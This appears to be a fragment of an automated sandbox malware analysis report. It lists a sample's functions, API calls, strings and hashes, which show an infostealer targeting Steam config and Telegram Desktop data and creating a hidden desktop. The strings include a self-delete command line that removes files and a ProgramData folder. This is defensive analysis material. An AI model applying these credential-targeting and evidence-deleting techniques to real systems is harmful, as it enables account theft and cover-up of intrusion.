                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                • API String ID: 86853776-1686486140
                                                                                                                                                                                                                                                                                • Opcode ID: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                • Instruction ID: 7bf5b1220a567134bc8680c304d03b75e5346a68b302ecb6bd04b7556a355826
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3431B130B043446BE200AB6298D67BF77A69BD574CF00451EF4451A282DFBC6DC98B9B
                                                                                                                                                                                                                                                                                Function 00407110 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringsleepCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                Function 00414FE0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 261registrystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                • API String ID: 393122709-2561568711
                                                                                                                                                                                                                                                                                • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                                Function 00416330 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                • Opcode ID: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                Function 00410B30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33registrymemoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                Function 00416B40 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 258stringsleepCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
